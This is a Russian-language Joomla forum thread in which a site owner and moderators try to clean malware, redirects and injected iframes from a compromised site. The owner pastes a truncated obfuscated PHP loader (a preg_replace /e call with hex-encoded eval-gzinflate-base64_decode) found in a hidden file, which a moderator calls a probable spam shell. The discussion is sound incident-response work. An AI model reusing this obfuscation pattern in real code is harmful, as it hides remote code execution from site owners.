Гугл ругает на вредоносное ПО.

Тема в разделе "Вопросы безопасности", создана пользователем elmundosoleil, 15.01.2013.

  1. Offline

    elmundosoleil Недавно здесь

    Регистрация:
    11.01.2013
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Женский
    Суть вот в чем. Есть сайт на джумле 1.5.22: http://www.archerycenter.ru/
    На нем после установки модуля меню был замечен редирект при переходе из поиковика(яндекса) на левый сайт. Меню и все что связанно с редиректом было удалено или заменено при помощи php replace(спасибо форуму за это). Все доступы по фтп удалены и есть только доступ по ssh, к которому поменян пароль.

    Теперь ХРОМ пишет, что сайт заражен вредоносным ПО, причем если только заходить через хром. Мазилле на это глубоко начхать. Скидывание сайта на комп и его проверка не дала никаких результатов. Причем если почистить кеш в хроме то он перестает вредничать, но на время.

    Самое интересное, что такое происходит пока что только на моем компе. Не у заказчиков не у друзей хром не ругается.
    Твориться какая то чертовщина. Прошу помощи или придется комп на крещение в прорубь окунать что бы избавить его от бесов. :D
    PS Проверка онлайн вирусами тоже не дала результатов.
     
  2.  
  3. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 037
    Симпатии:
    518
    Пол:
    Мужской
    проверь яваскрипты на iframe, в конце файла
     
  4. CB9T
    Offline

    CB9T Преподаватель по J! Команда форума

    Регистрация:
    21.05.2010
    Сообщения:
    2 461
    Симпатии:
    303
    Пол:
    Мужской
    Сегодня только чистил сайт от вирусов, советую:
    * JAMSS - Joomla! Anti-Malware Scan Script - есть ветка у нас на форуме

    Вот, какой код был, очень схожен с Вашим:
    0_779d9_962596a_orig.png
     
  5. Offline

    elmundosoleil Недавно здесь

    Регистрация:
    11.01.2013
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Женский
    Не нашла такой ветки. :(
     
    Последнее редактирование: 16.01.2013
  6. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 356
    Симпатии:
    370
    Пол:
    Мужской
  7. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 356
    Симпатии:
    370
    Пол:
    Мужской
    часто они бессильны, т.к. нет прямой угрозы на сайте, а редиректы идут через JavaScript. Им же iframe вставляется в html-код.

    Обычное место для шеллов и прочей дряни, как и tmp.
    Файл удалить! С форума тоже.
    Конкретно этот похоже для работы с email, возможно для рассылки спама.
     
    Последнее редактирование: 16.01.2013
  8. Offline

    elmundosoleil Недавно здесь

    Регистрация:
    11.01.2013
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Женский
    Спасибо большое за ссылку. Проверила, но не увидела каких то"квакозябр" :tease2:, кроме как/images/stories/.cache_bhcvym.php
    Код (PHP):
    1. ... preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'5b19fxq30jD8d/wp5C2nCw3GgJOc1DbEiWMnThM79 ...


    В кодах я разбираюсь не очень, но в основном как показалось iframe все от плагинов установленных уже давно.
    http://www.archerycenter.ru/jamss.php
     
  9. CB9T
    Offline

    CB9T Преподаватель по J! Команда форума

    Регистрация:
    21.05.2010
    Сообщения:
    2 461
    Симпатии:
    303
    Пол:
    Мужской
  10. Offline

    elmundosoleil Недавно здесь

    Регистрация:
    11.01.2013
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Женский
    Спасибо. Они почему то все равно появляются и появляются. Как такое возможно и как убрать что бы забыть об этом. Уж очень не хочется сносить и заново ставить сайт.
     
  11. Offline

    elmundosoleil Недавно здесь

    Регистрация:
    11.01.2013
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Женский
    Ведь может ли содержаться в кодах сайта не вирусное base64_decode?
     
  12. CB9T
    Offline

    CB9T Преподаватель по J! Команда форума

    Регистрация:
    21.05.2010
    Сообщения:
    2 461
    Симпатии:
    303
    Пол:
    Мужской
    Может, анализируйте по base64 encode
     
  13. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 037
    Симпатии:
    518
    Пол:
    Мужской
    http://joomla-support.ru/post152220-23.html
    100% защиты нет.Не верь никому кто пообещает 100 % защиту.
     
  14. Offline

    elmundosoleil Недавно здесь

    Регистрация:
    11.01.2013
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Женский
    Я пыталась этим сканером сделать, НО у меня больше 30 сек. не поставить выполнение скрипта на сервере(такой аккаунт)
    Поэтому этим скриптом увы никак.
     
  15. CB9T
    Offline

    CB9T Преподаватель по J! Команда форума

    Регистрация:
    21.05.2010
    Сообщения:
    2 461
    Симпатии:
    303
    Пол:
    Мужской
    Скопируй на ПК и через XAMP (денвер) убери лимит и просканируй сайт и обратно его.
     
  16. Offline

    elmundosoleil Недавно здесь

    Регистрация:
    11.01.2013
    Сообщения:
    8
    Симпатии:
    0
    Пол:
    Женский
    Все попытки зачистки привели ни к чему.
    Осталось два варианта:
    -нанять специалиста
    -все переустановить
     
  17. Offline

    Valery5 Недавно здесь

    Регистрация:
    03.07.2013
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    Второй вариант надежнее.
     

Поделиться этой страницей

Загрузка...